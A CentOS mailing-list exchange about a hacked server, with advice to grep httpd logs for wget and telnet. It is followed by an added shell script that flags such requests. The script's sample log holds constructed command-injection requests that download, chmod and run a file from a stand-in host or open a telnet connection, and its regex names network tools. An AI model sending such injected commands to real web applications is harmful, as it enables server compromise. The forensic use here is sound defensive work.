[CentOS] Uselib24/bindz - owned!

Tue May 9 00:18:07 UTC 2006
Benjamin Smith <lists at benjamindsmith.com>

A little hint that's helped me identify what happened before: 

Use grep to look for things like "telnet" and "wget" in the httpd logs. Since 
it doesn't exactly look like you've been rooted, these are probably intact 
and available. 

May be obvious, but it may also have been missed.... 


On Wednesday 03 May 2006 22:37, Nick wrote:
> Rick Philbrick wrote:
> > Hi,
> >
> > Well that's telling.  So do you have chkroot-kit installed?  Although
> > you know you've got to have a root-kit on there. Anyway, it may help
> > narrow your search of the directories and the changes within.
> >
> > -rickp
> >
> Well I quarantined the files and then ran rkhunter and chkrootkit and 
> both came back ok. Not going to risk not starting over on the box but if 
> I can't tell how they got in then I'm not stopping it happening again. 
> It could of course have something to do with one of the webapps the box 
> runs (forum software)...
> Also I found my iptables script wasn't blocking port 80 and port 21 
> outbound.... schoolboy error.
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos

"The best way to predict the future is to invent it."
- XEROX PARC slogan, circa 1978
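The grep-the-httpd-logs hint above, worked through as an added example (this is not code from the thread or from any list member). It assumes an Apache-style combined access log, decodes the common %20/%3B/%7C escapes first so "wget%20http" is not missed, and then reports every request line that names a download or remote-shell tool as a whole word. The log lines are constructed for the demonstration; the tool-name list is an assumption you would extend for your own environment.

```shell
#!/bin/sh
# Added example, not from the CentOS list thread: find httpd access-log
# requests that mention fetch/remote-shell tools (wget, telnet, ...), which is
# the usual trace left when a web app was coerced into pulling a file.
# Every log line below is constructed for this demo; none is real traffic.

# Write a small constructed access log (Apache combined format) to path $1.
make_sample_log() {
  cat > "$1" <<'EOF'
10.0.0.5 - - [03/May/2006:21:00:12 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [03/May/2006:21:01:43 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 8124 "-" "Mozilla/5.0"
192.0.2.77 - - [03/May/2006:21:05:02 +0000] "GET /forum/index.php?cmd=cd%20/tmp;wget%20http://example.invalid/x;chmod%20755%20x HTTP/1.1" 200 312 "-" "libwww-perl/5.79"
192.0.2.77 - - [03/May/2006:21:05:30 +0000] "GET /forum/index.php?cmd=telnet%20example.invalid%201234 HTTP/1.1" 200 312 "-" "libwww-perl/5.79"
10.0.0.5 - - [03/May/2006:21:07:10 +0000] "GET /forum/search.php?q=wget+tutorial HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
EOF
}

# Print every line whose quoted request field contains one of the tool names
# as a whole word. The sed pass undoes %20 (space), %3B (;) and %7C (|) so
# encoded command strings are matched too. Tool list is an assumption.
suspicious_requests() {
  sed 's/%20/ /g; s/%3[Bb]/;/g; s/%7[Cc]/|/g' "$1" \
    | grep -iE '"[A-Z]+ [^"]*[^[:alnum:]_](wget|curl|telnet|netcat|nc|lynx)([^[:alnum:]_]|$)'
}

# Number of matching lines: a quick "is there anything to look at?" answer.
count_suspicious() {
  suspicious_requests "$1" | wc -l | tr -d ' '
}

# Matches grouped by client address, most active first, so one source
# firing many probes stands out from a stray benign hit.
hits_by_client() {
  suspicious_requests "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Stand-alone run against the constructed log.
LOG="${TMPDIR:-/tmp}/access_demo.$$.log"
make_sample_log "$LOG"
suspicious_requests "$LOG"
hits_by_client "$LOG"
```

On the sample log this flags three lines: the two command-injection probes from 192.0.2.77 and one benign forum search for "wget tutorial". That false positive is the point of the per-client summary: grep gives you leads to triage, not verdicts, and the address with several hits in a row is the one to read around in the log.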